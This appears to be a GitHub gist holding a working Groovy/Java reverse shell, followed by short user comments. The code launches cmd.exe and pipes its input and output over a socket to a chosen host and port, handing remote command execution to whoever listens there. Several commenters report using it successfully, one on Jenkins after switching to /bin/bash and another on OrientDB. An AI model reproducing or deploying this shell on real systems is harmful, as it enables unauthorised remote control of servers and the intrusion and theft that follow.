Pure Groovy/Java Reverse Shell
String host="localhost"; | |
int port=8044; | |
String cmd="cmd.exe"; | |
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); |
This comment has been minimized.
This comment has been minimized.
Works well - Thanks :) |
This comment has been minimized.
This comment has been minimized.
N111ce! |
This comment has been minimized.
This comment has been minimized.
Very Nice! |
This comment has been minimized.
This comment has been minimized.
I know I'm late on this, but some things are timeless. This just worked great for me. I simply needed to switch out cmd.exe with /bin/bash because Jenkins was running on a Linux box. Thanks for this! |
This comment has been minimized.
This comment has been minimized.
Well done! |
This comment has been minimized.
This comment has been minimized.
Thanks Man |
This comment has been minimized.
This comment has been minimized.
I tried t run this however I got the error org.codehaus.groovy.control.MultipleCompilationErrorsException: startup failed: |
This comment has been minimized.
This comment has been minimized.
buenisima si señor :) |
This comment has been minimized.
This comment has been minimized.
thank you sir. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
Nice one Chris.
Tested this on Orientdb-Linux and worked a treat.